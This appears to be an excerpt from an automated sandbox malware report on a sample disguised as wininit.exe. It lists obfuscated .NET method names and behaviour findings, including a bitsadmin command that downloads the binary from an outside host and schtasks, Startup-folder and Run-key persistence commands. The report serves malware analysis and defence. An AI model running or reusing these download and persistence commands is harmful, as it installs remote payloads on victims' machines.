                      Source: wininit.exe.5.dr, O4fo8BCjnNCwEmwjuOk909aLEMrJnQGlNiMmsokpvUNs28JOr9NJOa1KOlvo8fuohjLXCgPy2WhOzv4xur.csHigh entropy of concatenated method names: 'rNzCwKhEA5jxqf2DGIUdk1JROnkQCzlaWEu4XXE8otMASVneNFurAWxFcl1HB1FfGrIJFH3ITC0AWy3Kra', 'vYqE3RhUUuDkKx80UaFt692DM4qhaYJtLNhExNrORa4IoCChppfBfcX2MRt3Ssd9jmnjQTROXTKyKPSkb0', '_6XLj2hTRFFyT8iED3aMgTkI5cbWFRppmJls97KewJHoFOXmdlyh0lDxpfBRnlUbAhg6sCi2Vs0lGGnJXlK', 'L2geSOWG3GoNEH9QYgOD3240', 'D0qNFJPak9qwmms0KvqWsv9N', 'INYJ1lGCXhbaL4RAahO9hO8S', 'UE7uAlQ9OhJCvVA2BeFASEUv', 'HGxSxwm3el1k1QIl5jgRvWhE', 'OpnESpMDLwhqm2YrTWeUezij', 'zPpN1JE9Bgfy2zRdJMnkqYf5'
                      Source: wininit.exe.5.dr, jeedmwCGdFhBcqZCA15WaP7jTKXlAF7sGR7nB57ve4F5wgrajMWJJsDDFY0I1vl6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'h59vIOhTuXoIHrkDb7ca9gqUvSP2AXN4Cq3iR2ycTR3nYH4HhGrgeQ7SnTy6dbiJpgpJX0o0NsHd3dEkql', 'BeTuFPnycy6pWb5p1YopgxtblRUi0cqXPdC4b8TTh5OYevCCygB3N36ZQDF4UXlp7lZW3g5zKTP5PGb41z', '_7Io0hzVl8T88nX41KBj4rIb0', 'yMu83MRGOhZkbdIpZjugP14m'
                      Source: wininit.exe.5.dr, xaTyEYG3tM6dhGUM43tuLNgAQtUu8Voa3zSAj5FxOU1z62TCl.csHigh entropy of concatenated method names: 'bNRqxAI6ScANdA83639TnYaemlSXwLGwmQbIm4BGWMtPOdgpU', 'KhPuoqOD5oClw0fbPBsy7o8VpCmjLmQAhkfuACCFNnGcRKeh2', 'PleEGhZJ4ayjB57QATIYo8FvhLCIl8kRIZm7I2yllDLENQ8WC', 'wqUTWKp6OfOKixBG32RpId98', 'kg0ZpoaqrzLya4D2c973veMQ', 'CQyMUprWsGeW4c9J5b0dEZnx', 'uWhmyQWPwd008Of90lBInVwE', 'x0YNYitysT2f1B51surYTvQS', '_2A7ePYYHNGJGiyZmXYw6JtDI', '_6PKadTSdIBBTvquFkdnzChzT'
                      Source: wininit.exe.5.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csHigh entropy of concatenated method names: 'YP8zvgzbKr3X1TSTzDwz5rPoOMpP47hi2bMGqsjARuO58Awr3', '_7Ae6fk131Q32VUxvWVTQ2vIdaNM2ft2r6ytyMappEY1tsxQFT', 'rdlKghPhNlDVRYiLCJOxLTIDRjMaAJ8ZBqg6oGIhxGn40zYBf', 'OlRjhnbqYda0vWnO0csMwwOwfCIET5cmdwMFkIwispB9P4tLD', 'HQASlGnJ8sWTKhT5gKo2x7e6W7swI15dMn11lP9sdcO5QFm3M', 'Jq0bmtiEusqE1gzakdT8j45P7KS5ReV6bKP0reeEGYL0h9IcK', 'NkEN5kuy33L8z9VUjVtfOzmelJnigmLUvFYguOjVaLSevjBc5', 'TggHJ4WTcTmuS6MDh7BLTYkibpFkhtmWLzN5ScfAeEmQLQ3p5', 'VFYPGKkHfYiunNlVlNWSDPicuWYajg5g49U9YrQC5ov1XAQeD', 'fTKDRvFM49GwUocdW8NzCBgKFKQ3KGErJyPCYrNNknwKoiLVU'
                      Source: wininit.exe.5.dr, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.csHigh entropy of concatenated method names: '_200IYWRkJXTEvIev0wyVQ8khuzz5TkaXLRB5odqRv1i1aZFWy', '_79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC', 'dGmPWh99HplGCmVameubZh6Bn1If4z3SszJenghcDcRscWDZv', 'kk7xwRdXAQjHR3lDKHa4IY1aEU4X6OFZ2QPIIkuJqODCYdnwb', '_3D2GkrlgeTBtjdCapz3A0tAFNjqUw6VztscyZTEY8Jno4DefZ', '_0cA0rRTi3EUU50MCjV09wLrCvJR1ZhbzpZyrMhpraWOFsebkd', 'gPAxFIVD0V9XYobMwdMOUzGryl9Tq6b8PDLiSj93KH9Vr3orP', 'gqGNaCh0zu3iBmJrrJ6D4LVl3RaXyiyt7YnuXheh8mpEIweKn', 'yRdIWKoyLedB5sZgzrCMEYLkznbAQB1C48thx4nKRSqsLja77', 'Q2geSFU2GkHWD6ZCYzuFBiMx2etNoUvSQ4q5T1GDJaTGrr2bp'
                      Source: wininit.exe.5.dr, ekkMiDv0naq3sjxJyXfIR1x5yXvl1xKtORIjB3FBlkLzSnlEI.csHigh entropy of concatenated method names: 'S7oci1pip6wZx2y2vUfCY9CCLyBdr6zoDLTU6pfV8e0RGe1HL', 'pyBVG2zto9vz9EE8HnjMKnvrDEQI5Aunko6ShQZXZGixZUKVH', 'navDs1FhMJfT5RIxv6tSK7As017Kp9dD7Rn1wxHrqin2tIDK9', 'WhXvhkddoBH9uFSy5eUcOKkQZHwjJ835epzRkkUbP91WVT7HL', 'gwPhuzzmFIH0oXOkWusYDt6YSJK3x6rvqiWFVVLuT2vU6kL2X', 'vetr6RQtXdLxFQ5LgEhNJXfCf9i3rWWX7rQ1Nyne85wANsWkH', 'TZ36Zj4ysqIFu25fYfzSu5iQP7HgEE3TPXD6F12T18T4OaUtd', 'IM6nIfsB33pJMOxvjlefgnnlHSfZ7opxqlKhTURPZSlWCz1JY', 'zAMDB2Sm7T6vLcNYj4ROolEippMm8FlBTM2fJW8lHuakIEuS0', 'sAs1CvbSSXDTXpIippToMHMCuYJu6jeoptb0nX0Dn8XISn64u'
                      Source: wininit.exe.5.dr, 0cgrNmkHxZRuAQEqRimtas6lLl5iBAzJCeHLHLif0Cvv39xyjt35uB2sia2x9huxx5fL0C9RrdrO8HA9Kv.csHigh entropy of concatenated method names: 'NYQjxEafQiKx4H71pyQajo2KOqj1TiUjbeqvnzq9Pr5sZV01IaBmPVj1jdZseqX90REFKGWsK6JHhFbNT9', '_8x41fVnVzdVtXRIhY20zi8q0a3lWuCJZ3a5WYYSod13DX3weAXibqHIfCFCcyAClpDPeZD0OaO1gr1nZkd', 'NG6KL4SqQbctl477Z1rBJeaWdLAOqpZIKLQkoWkzv548d45WOJLPaHLwoQR3K77fr41XP0tvoVN2pt0LMr', 'FNUc2S0sTWx6sILVStIE6r0ZScX9X5SlECl6h9XSvBYmrapkw2NExIUssGjY90yvoV4cwCpYpE8aet08Ua', 'x4ia9IJOWCm9KHfsjDZfCNdn', 'ShNGhW38GUzqDUFKTYramyfe', 'f8jlYeW0h2IjFh7FzKKUg9BU', 'mVzI7aBt1zP6YoGAo2SHrf8b', 'TwmBG6S7RE615Y2U9RdY75nX', 'eyqj4o8T9oE6mMD6EAec6lo4'
                      Source: wininit.exe.5.dr, 28YENLqzYH38q0lvSHq8cdgEkxEBgvoW17YoNf76xEbjh3XKx.csHigh entropy of concatenated method names: 'wFjkhLY4LoZKYwJa0AgL7JA91uaNVO2SkT4nyih3Gs4hZ8VGU', 'RUA4E1eRbVUByXGt869zgGugRmKiDQBeP7rGSz8Wurrp58fn0', 'LU47xaoZ2v6v98XVJR117BDC5FmeALSJkIAjBXD9FsAOsYFYH', 'dmPn64gMgTov1b5NPB09PLmiqacm2BLpgYQ9pDVyEUhVTiIot', 'enGUfBbMbPrDYNNcn5KqTGd2rYWqmmITrdhxp8xAoaIYo4jhn', 'kfbhyKaWBd8YKci6LA3h4u1bSxwJ5T5Gbjrol551lVFHYxalA', 'MnkSTQYh4TOxUyl9QNdTSBuObfkq70V76tCLS5EOulQpzBF7i', '_4l0KmjQ39YQqzw57zkobh0SjqKWelJ7LrNeQ2iRqdzCewWTKT', 'cMqeuU3kNgXzh1N4r0KRP0Jc0LsPCe6qbvvwT3G2UBR1TLW2K', 'FAg0JpcnytEPf6Dzm7BR7V5bRQY9ztMRKdryaZ4kQGywh0mva'
                      Source: wininit.exe.5.dr, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csHigh entropy of concatenated method names: 'AcisUNCSuVFrBikpjiolvARXB02lFHiP4vtsFOIpIJ2DMbwu28uI7QOSpqz9GU0HPZf20b7gXKNv1moIaH', 'gTRHx9arOKRVotnoIrZKicfQ', 'u9eGy0zRxOfvoHxI8o8ueKAu', 'CBjzxk5vc0zWIz32x0QeW6CU', 'w21H32QCMSqEug7WDQkGRyoy'
                      Source: wininit.exe.5.dr, JTUajwZX3bMUNOY0rg3Pwk92NPZAXHesr02c48g1DUybCmimQ.csHigh entropy of concatenated method names: 'e7JEgLIyCKYdgbReH8mq6nqtiAqeh2614BsiouiQLaKibzVCM', 'x21N60NoZ5CLkBrvfK3AdQSj', 'mAGU8HtdtxCs5hmekd1tLME5', 'fQ6mchearhcE8vIuznCdPYZN', 'h66xZRtvI20tuBqdyerpBxSS'
                      Source: wininit.exe.5.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csHigh entropy of concatenated method names: 'TaWBmBsELjv5ZsS0acJTWcHbv5YUUXsh570w7OI95hwDxcgYCmWRqlaXspogRYWjbyRGNPGmJWet17cUFB', 'NNrn5oq8k7vsV61gtCbylTPezpy79dUQQh4bwHKzNqQW20CjtxkF1kj0KU1F8NQFlZZk5hLN1YPMOIogDF', 'WIk5b8uMUVcHO1Fp4gQ7qzirTJoI3fKvoBPfwpWdgWeFkBkFd0cWtsb523Vc8xGzqmEshx0aqK7QYu7Fh5', 'yurrNEi67T8C0XBpq87n8zeRyrDeJ0kg90quHF5lXKNxxaaMfxDdqSy3OvrBaMJXSjYzJyPQvHKXCeFCDt', 'YIZzebrGnSb2NRPXP1dEZVqIHIbCxRO5NuGXN592WKiBVffdmpGzZN1f69OV6sBax1xNwHGj01XCjpoU0X', 'QyNbfu3UMCLAq7wREA47xDt8w6tWtuRxUwxKnIBFWESTTstqCDkPbq2Tx3DpcaXcRxahYI0h1RVnzVueZt', '_3NRSEKWHhWrAXapI0GlMsHe6Prjdia8XvttGp9lWFTzJv5YbLrBQE1lWznTmnUBuegzIyOsv3MTVflqOev', 'HnMB8wYHWCvC9e2BWXniO494cO6FSXcr3sGDp4T2vXvZY8vtm0o7Ny85MfvFIkFuTgaZvLwRgdeGTpVC0w', 'KRj7qRjQa2ixwuEkGItZz79XHSyCmUQXoL2jLGQSdMLcMzSNfrcsvkRcxr1s7jjWa3vZ3LXJOmnll2pCkp', 'lYVkbVw3fZHQOQbjuREA8NMLcQXhlcTjTVoNOKnZWJhW4iuhbcJ7fsOaW3bEb4WxtpOBIilBdJCrNueh4p'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, O4fo8BCjnNCwEmwjuOk909aLEMrJnQGlNiMmsokpvUNs28JOr9NJOa1KOlvo8fuohjLXCgPy2WhOzv4xur.csHigh entropy of concatenated method names: 'rNzCwKhEA5jxqf2DGIUdk1JROnkQCzlaWEu4XXE8otMASVneNFurAWxFcl1HB1FfGrIJFH3ITC0AWy3Kra', 'vYqE3RhUUuDkKx80UaFt692DM4qhaYJtLNhExNrORa4IoCChppfBfcX2MRt3Ssd9jmnjQTROXTKyKPSkb0', '_6XLj2hTRFFyT8iED3aMgTkI5cbWFRppmJls97KewJHoFOXmdlyh0lDxpfBRnlUbAhg6sCi2Vs0lGGnJXlK', 'L2geSOWG3GoNEH9QYgOD3240', 'D0qNFJPak9qwmms0KvqWsv9N', 'INYJ1lGCXhbaL4RAahO9hO8S', 'UE7uAlQ9OhJCvVA2BeFASEUv', 'HGxSxwm3el1k1QIl5jgRvWhE', 'OpnESpMDLwhqm2YrTWeUezij', 'zPpN1JE9Bgfy2zRdJMnkqYf5'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, jeedmwCGdFhBcqZCA15WaP7jTKXlAF7sGR7nB57ve4F5wgrajMWJJsDDFY0I1vl6.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'h59vIOhTuXoIHrkDb7ca9gqUvSP2AXN4Cq3iR2ycTR3nYH4HhGrgeQ7SnTy6dbiJpgpJX0o0NsHd3dEkql', 'BeTuFPnycy6pWb5p1YopgxtblRUi0cqXPdC4b8TTh5OYevCCygB3N36ZQDF4UXlp7lZW3g5zKTP5PGb41z', '_7Io0hzVl8T88nX41KBj4rIb0', 'yMu83MRGOhZkbdIpZjugP14m'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, xaTyEYG3tM6dhGUM43tuLNgAQtUu8Voa3zSAj5FxOU1z62TCl.csHigh entropy of concatenated method names: 'bNRqxAI6ScANdA83639TnYaemlSXwLGwmQbIm4BGWMtPOdgpU', 'KhPuoqOD5oClw0fbPBsy7o8VpCmjLmQAhkfuACCFNnGcRKeh2', 'PleEGhZJ4ayjB57QATIYo8FvhLCIl8kRIZm7I2yllDLENQ8WC', 'wqUTWKp6OfOKixBG32RpId98', 'kg0ZpoaqrzLya4D2c973veMQ', 'CQyMUprWsGeW4c9J5b0dEZnx', 'uWhmyQWPwd008Of90lBInVwE', 'x0YNYitysT2f1B51surYTvQS', '_2A7ePYYHNGJGiyZmXYw6JtDI', '_6PKadTSdIBBTvquFkdnzChzT'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csHigh entropy of concatenated method names: 'YP8zvgzbKr3X1TSTzDwz5rPoOMpP47hi2bMGqsjARuO58Awr3', '_7Ae6fk131Q32VUxvWVTQ2vIdaNM2ft2r6ytyMappEY1tsxQFT', 'rdlKghPhNlDVRYiLCJOxLTIDRjMaAJ8ZBqg6oGIhxGn40zYBf', 'OlRjhnbqYda0vWnO0csMwwOwfCIET5cmdwMFkIwispB9P4tLD', 'HQASlGnJ8sWTKhT5gKo2x7e6W7swI15dMn11lP9sdcO5QFm3M', 'Jq0bmtiEusqE1gzakdT8j45P7KS5ReV6bKP0reeEGYL0h9IcK', 'NkEN5kuy33L8z9VUjVtfOzmelJnigmLUvFYguOjVaLSevjBc5', 'TggHJ4WTcTmuS6MDh7BLTYkibpFkhtmWLzN5ScfAeEmQLQ3p5', 'VFYPGKkHfYiunNlVlNWSDPicuWYajg5g49U9YrQC5ov1XAQeD', 'fTKDRvFM49GwUocdW8NzCBgKFKQ3KGErJyPCYrNNknwKoiLVU'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, lgOagQduF6xT0xNr8HJEardsobGMfXzs6Czi3u2Sd3L0acGaw.csHigh entropy of concatenated method names: '_200IYWRkJXTEvIev0wyVQ8khuzz5TkaXLRB5odqRv1i1aZFWy', '_79PiUcFY60MV4sY1q8U38GCzz2FBKgfo5xy5WbrD9j4RFOWqC', 'dGmPWh99HplGCmVameubZh6Bn1If4z3SszJenghcDcRscWDZv', 'kk7xwRdXAQjHR3lDKHa4IY1aEU4X6OFZ2QPIIkuJqODCYdnwb', '_3D2GkrlgeTBtjdCapz3A0tAFNjqUw6VztscyZTEY8Jno4DefZ', '_0cA0rRTi3EUU50MCjV09wLrCvJR1ZhbzpZyrMhpraWOFsebkd', 'gPAxFIVD0V9XYobMwdMOUzGryl9Tq6b8PDLiSj93KH9Vr3orP', 'gqGNaCh0zu3iBmJrrJ6D4LVl3RaXyiyt7YnuXheh8mpEIweKn', 'yRdIWKoyLedB5sZgzrCMEYLkznbAQB1C48thx4nKRSqsLja77', 'Q2geSFU2GkHWD6ZCYzuFBiMx2etNoUvSQ4q5T1GDJaTGrr2bp'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, ekkMiDv0naq3sjxJyXfIR1x5yXvl1xKtORIjB3FBlkLzSnlEI.csHigh entropy of concatenated method names: 'S7oci1pip6wZx2y2vUfCY9CCLyBdr6zoDLTU6pfV8e0RGe1HL', 'pyBVG2zto9vz9EE8HnjMKnvrDEQI5Aunko6ShQZXZGixZUKVH', 'navDs1FhMJfT5RIxv6tSK7As017Kp9dD7Rn1wxHrqin2tIDK9', 'WhXvhkddoBH9uFSy5eUcOKkQZHwjJ835epzRkkUbP91WVT7HL', 'gwPhuzzmFIH0oXOkWusYDt6YSJK3x6rvqiWFVVLuT2vU6kL2X', 'vetr6RQtXdLxFQ5LgEhNJXfCf9i3rWWX7rQ1Nyne85wANsWkH', 'TZ36Zj4ysqIFu25fYfzSu5iQP7HgEE3TPXD6F12T18T4OaUtd', 'IM6nIfsB33pJMOxvjlefgnnlHSfZ7opxqlKhTURPZSlWCz1JY', 'zAMDB2Sm7T6vLcNYj4ROolEippMm8FlBTM2fJW8lHuakIEuS0', 'sAs1CvbSSXDTXpIippToMHMCuYJu6jeoptb0nX0Dn8XISn64u'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, 0cgrNmkHxZRuAQEqRimtas6lLl5iBAzJCeHLHLif0Cvv39xyjt35uB2sia2x9huxx5fL0C9RrdrO8HA9Kv.csHigh entropy of concatenated method names: 'NYQjxEafQiKx4H71pyQajo2KOqj1TiUjbeqvnzq9Pr5sZV01IaBmPVj1jdZseqX90REFKGWsK6JHhFbNT9', '_8x41fVnVzdVtXRIhY20zi8q0a3lWuCJZ3a5WYYSod13DX3weAXibqHIfCFCcyAClpDPeZD0OaO1gr1nZkd', 'NG6KL4SqQbctl477Z1rBJeaWdLAOqpZIKLQkoWkzv548d45WOJLPaHLwoQR3K77fr41XP0tvoVN2pt0LMr', 'FNUc2S0sTWx6sILVStIE6r0ZScX9X5SlECl6h9XSvBYmrapkw2NExIUssGjY90yvoV4cwCpYpE8aet08Ua', 'x4ia9IJOWCm9KHfsjDZfCNdn', 'ShNGhW38GUzqDUFKTYramyfe', 'f8jlYeW0h2IjFh7FzKKUg9BU', 'mVzI7aBt1zP6YoGAo2SHrf8b', 'TwmBG6S7RE615Y2U9RdY75nX', 'eyqj4o8T9oE6mMD6EAec6lo4'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, 28YENLqzYH38q0lvSHq8cdgEkxEBgvoW17YoNf76xEbjh3XKx.csHigh entropy of concatenated method names: 'wFjkhLY4LoZKYwJa0AgL7JA91uaNVO2SkT4nyih3Gs4hZ8VGU', 'RUA4E1eRbVUByXGt869zgGugRmKiDQBeP7rGSz8Wurrp58fn0', 'LU47xaoZ2v6v98XVJR117BDC5FmeALSJkIAjBXD9FsAOsYFYH', 'dmPn64gMgTov1b5NPB09PLmiqacm2BLpgYQ9pDVyEUhVTiIot', 'enGUfBbMbPrDYNNcn5KqTGd2rYWqmmITrdhxp8xAoaIYo4jhn', 'kfbhyKaWBd8YKci6LA3h4u1bSxwJ5T5Gbjrol551lVFHYxalA', 'MnkSTQYh4TOxUyl9QNdTSBuObfkq70V76tCLS5EOulQpzBF7i', '_4l0KmjQ39YQqzw57zkobh0SjqKWelJ7LrNeQ2iRqdzCewWTKT', 'cMqeuU3kNgXzh1N4r0KRP0Jc0LsPCe6qbvvwT3G2UBR1TLW2K', 'FAg0JpcnytEPf6Dzm7BR7V5bRQY9ztMRKdryaZ4kQGywh0mva'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csHigh entropy of concatenated method names: 'AcisUNCSuVFrBikpjiolvARXB02lFHiP4vtsFOIpIJ2DMbwu28uI7QOSpqz9GU0HPZf20b7gXKNv1moIaH', 'gTRHx9arOKRVotnoIrZKicfQ', 'u9eGy0zRxOfvoHxI8o8ueKAu', 'CBjzxk5vc0zWIz32x0QeW6CU', 'w21H32QCMSqEug7WDQkGRyoy'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, JTUajwZX3bMUNOY0rg3Pwk92NPZAXHesr02c48g1DUybCmimQ.csHigh entropy of concatenated method names: 'e7JEgLIyCKYdgbReH8mq6nqtiAqeh2614BsiouiQLaKibzVCM', 'x21N60NoZ5CLkBrvfK3AdQSj', 'mAGU8HtdtxCs5hmekd1tLME5', 'fQ6mchearhcE8vIuznCdPYZN', 'h66xZRtvI20tuBqdyerpBxSS'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csHigh entropy of concatenated method names: 'TaWBmBsELjv5ZsS0acJTWcHbv5YUUXsh570w7OI95hwDxcgYCmWRqlaXspogRYWjbyRGNPGmJWet17cUFB', 'NNrn5oq8k7vsV61gtCbylTPezpy79dUQQh4bwHKzNqQW20CjtxkF1kj0KU1F8NQFlZZk5hLN1YPMOIogDF', 'WIk5b8uMUVcHO1Fp4gQ7qzirTJoI3fKvoBPfwpWdgWeFkBkFd0cWtsb523Vc8xGzqmEshx0aqK7QYu7Fh5', 'yurrNEi67T8C0XBpq87n8zeRyrDeJ0kg90quHF5lXKNxxaaMfxDdqSy3OvrBaMJXSjYzJyPQvHKXCeFCDt', 'YIZzebrGnSb2NRPXP1dEZVqIHIbCxRO5NuGXN592WKiBVffdmpGzZN1f69OV6sBax1xNwHGj01XCjpoU0X', 'QyNbfu3UMCLAq7wREA47xDt8w6tWtuRxUwxKnIBFWESTTstqCDkPbq2Tx3DpcaXcRxahYI0h1RVnzVueZt', '_3NRSEKWHhWrAXapI0GlMsHe6Prjdia8XvttGp9lWFTzJv5YbLrBQE1lWznTmnUBuegzIyOsv3MTVflqOev', 'HnMB8wYHWCvC9e2BWXniO494cO6FSXcr3sGDp4T2vXvZY8vtm0o7Ny85MfvFIkFuTgaZvLwRgdeGTpVC0w', 'KRj7qRjQa2ixwuEkGItZz79XHSyCmUQXoL2jLGQSdMLcMzSNfrcsvkRcxr1s7jjWa3vZ3LXJOmnll2pCkp', 'lYVkbVw3fZHQOQbjuREA8NMLcQXhlcTjTVoNOKnZWJhW4iuhbcJ7fsOaW3bEb4WxtpOBIilBdJCrNueh4p'

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files with benign system names
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                      Tries to download files via bitsadmin
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\wininit.exe (copy)Jump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe"
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wininit.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run wininitJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
